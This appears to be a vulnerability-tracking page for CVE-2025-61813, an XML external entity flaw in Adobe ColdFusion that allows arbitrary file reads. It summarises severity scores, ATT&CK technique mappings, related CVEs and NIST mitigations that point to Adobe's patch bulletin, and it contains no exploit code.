Cyber Resilience

CVE-2025-61813

HighUpdated

Published: 10 December 2025

Published
10 December 2025
Modified
01 June 2026
KEV Added
Patch
CVSS Score v3.1 8.2 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:L
EPSS Score 0.0004 13.3th percentile
Risk Priority 16 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-61813 is a high-severity Improper Restriction of XML External Entity Reference (CWE-611) vulnerability in Adobe Coldfusion. Its CVSS base score is 8.2 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 13.3th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 CM-6 (Configuration Settings) and SI-10 (Information Input Validation).

Deeper analysis

CVE-2025-61813 is an Improper Restriction of XML External Entity Reference (XXE) vulnerability, classified under CWE-611, affecting Adobe ColdFusion versions 2025.4, 2023.16, 2021.22, and earlier. This flaw enables arbitrary file system reads, allowing attackers to access sensitive files on the server. It carries a CVSS v3.1 base score of 8.2 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:L), reflecting high confidentiality impact with low attack complexity and changed scope.

An unauthenticated attacker can exploit this vulnerability remotely with low complexity by tricking a user into interacting with malicious XML input, such as processing a crafted document or file upload. Upon successful exploitation, the attacker gains the ability to read arbitrary files on the server, potentially exposing configuration data, credentials, or other sensitive information, though integrity and availability impacts remain low.

Adobe Security Bulletin APSB25-105, available at https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html, details patches and recommended mitigations for affected ColdFusion versions. Security practitioners should apply these updates promptly and review server configurations for XML processing to prevent exploitation.

EU & UK References

Vulnerability details

ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files on the…

more

server. Exploitation of this issue does requires user interaction and scope is changed.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1005 Data from Local System Collection
Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.
Why these techniques?

T1190: XXE in public-facing Adobe ColdFusion enables exploitation of remote services. T1005: Vulnerability directly allows arbitrary local file system reads.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2025-49535Same product: Adobe Coldfusion
CVE-2025-61821Same product: Adobe Coldfusion
CVE-2026-27305Same product: Adobe Coldfusion
CVE-2025-54261Same product: Adobe Coldfusion
CVE-2026-27304Same product: Adobe Coldfusion
CVE-2025-61809Same product: Adobe Coldfusion
CVE-2025-61810Same product: Adobe Coldfusion
CVE-2025-61811Same product: Adobe Coldfusion
CVE-2026-27282Same product: Adobe Coldfusion
CVE-2026-34619Same product: Adobe Coldfusion

Affected Assets

adobe
coldfusion
2021, 2023, 2025

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly remediates the XXE flaw in ColdFusion via timely patching as recommended in Adobe bulletin APSB25-105, preventing arbitrary file reads.

prevent

Validates untrusted XML inputs processed by ColdFusion to block external entity references that enable file system disclosure.

prevent

Enforces secure configuration settings for ColdFusion's XML parser to disable external entity processing, mitigating XXE exploitation.

References